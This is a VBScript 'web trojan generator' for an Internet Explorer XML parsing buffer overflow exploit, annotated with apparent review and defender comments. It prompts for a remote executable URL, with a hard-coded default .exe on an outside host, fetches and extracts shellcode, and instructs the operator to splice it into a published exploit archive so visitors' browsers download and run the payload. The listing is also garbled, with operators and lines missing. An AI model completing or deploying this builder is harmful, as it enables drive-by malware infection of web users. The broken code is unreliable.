
網馬生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day

'code by lcx

' Script-level setup for a Windows Script Host builder: prompt for an
' executable URL, fetch a page, and cut a "$shellcode = ..." span out of it.
' NOTE(review): this copy of the listing is damaged by extraction (operators
' and whole lines are missing further down) and is not runnable as shown.
' Every runtime error from here on is silently ignored.
On Error Resume Next
' The prompt default is a hard-coded remote .exe URL; for triage, treat that
' URL as an indicator taken from this page. Exeurl is not read again anywhere
' in the visible listing.
Exeurl = InputBox( "請(qǐng)輸入exe的地址:", "輸入", "http://www.haiyangtop.net/333.exe" )

' NOTE(review): "url" is never assigned in the visible listing, so the page
' being fetched cannot be determined from here.
Body = getHTTPPage(url)
Set Re = New RegExp
' Greedy capture from the literal "$shellcode =" through the "/div>/pre>"
' marker ([\s\S] also spans line breaks). The marker presumably lost its "<"
' characters during extraction - confirm against an intact copy.
Re.Pattern = "(\$shellcode \=[\s\S]+/div>/pre>)"

Set Matches = Re.Execute(Body)
' Keep only the first match; when nothing matches, Body remains the full page.
If Matches.Count>0 Then Body = Matches(0).value

' Strip, in order: the "$shellcode =" prefix, double quotes (Chr(34)), CR,
' semicolons, the "/div>/pre>" marker, LF and every "." character, then trim.
code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"/div>/pre>",""),Chr(10),""),".",""))

' replaceregex(str): as listed, only instantiates a RegExp object.
' The function name is never assigned, so callers receive Empty and "str" is
' unused. NOTE(review): the transformation this helper performed appears to be
' missing from this copy of the listing.
function replaceregex(str)
set regex=new regExp
end Function

' getHTTPPage(Path): fetch the raw response bytes for Path via GetBody and
' return them decoded as GB2312 text via BytesToBstr.
Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage = BytesToBstr(t, "GB2312")
End Function

' GetBody(url): return the binary response body for url, using the
' Microsoft.XMLHTTP COM object.
' Errors are suppressed, so a failed request yields an empty result rather
' than a visible error.
' NOTE(review): lines appear to be missing from this copy; the listing reads
' ResponseBody directly after Open.
' Defender note: HTTP requests issued by a script host through this COM object
' are a useful signal to log and alert on.
Function GetBody(url)
On Error Resume Next
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
' Synchronous GET (third argument False) with empty user name and password.
.Open "Get", url, False, "", ""
GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function

' BytesToBstr(Body, Cset): convert a byte array to a string by round-tripping
' it through an ADODB.Stream, decoding with the character set named in Cset.
Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream = CreateObject("adodb.stream")
' Type 1 = binary stream, Mode 3 = read/write.
objstream.Type = 1
objstream.Mode = 3
objstream.Write Body
' Rewind before switching the stream type; Type 2 = text.
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
Set objstream = Nothing
End Function

' URLEncoding(vstrIn): builds strReturn one character at a time and returns it.
' NOTE(review): this block is not valid VBScript as shown. Extraction dropped
' operators and at least the loop terminator and one branch keyword, so its
' exact behaviour cannot be stated from this copy. It appears intended to
' percent-encode characters whose code falls outside the single-byte range -
' confirm against an intact copy.
' The function is not called anywhere in the visible listing.
Function URLEncoding(vstrIn)
strReturn = ""
For aaaa = 1 To Len(vstrIn)
ThisChr = Mid(vStrIn,aaaa,1)
If Abs(Asc(ThisChr)) HFF Then
strReturn = strReturn ThisChr
innerCode = Asc(ThisChr)
If innerCode 0 Then
innerCode = innerCode + H10000
End If
' Split the character code into a high and a low part, each emitted as "%" plus hex.
Hight8 = (innerCode And HFF00)\ HFF
Low8 = innerCode And HFF
strReturn = strReturn "%" Hex(Hight8) "%" Hex(Low8)
End If
URLEncoding = strReturn
End Function

' Output stage: write the processed text to a.txt in the current directory and
' echo it to the operator.
' Mode 2 opens the file for writing and the third argument (true) creates it
' if absent. The file handle fileS is never closed in the visible listing.
' Defender note: a script-host process that creates a.txt next to the script
' right after an outbound fetch is the on-disk artifact of this builder.
set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("a.txt",2,true)
' As listed, replaceregex returns Empty, so this writes a blank line.
fileS.writeline replaceregex(code)
'fileS.writeline body
wscript.echo replaceregex(code)
set fso=Nothing

' Status message (Chinese): reports that a.txt was generated and names the
' external archive the output is meant for.
' NOTE(review): the concatenation operators on this line were lost in
' extraction.
wscript.echo Chr(13)"ok,生成a.txt,請(qǐng)用a.txt里的替換http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1內(nèi)容即可"

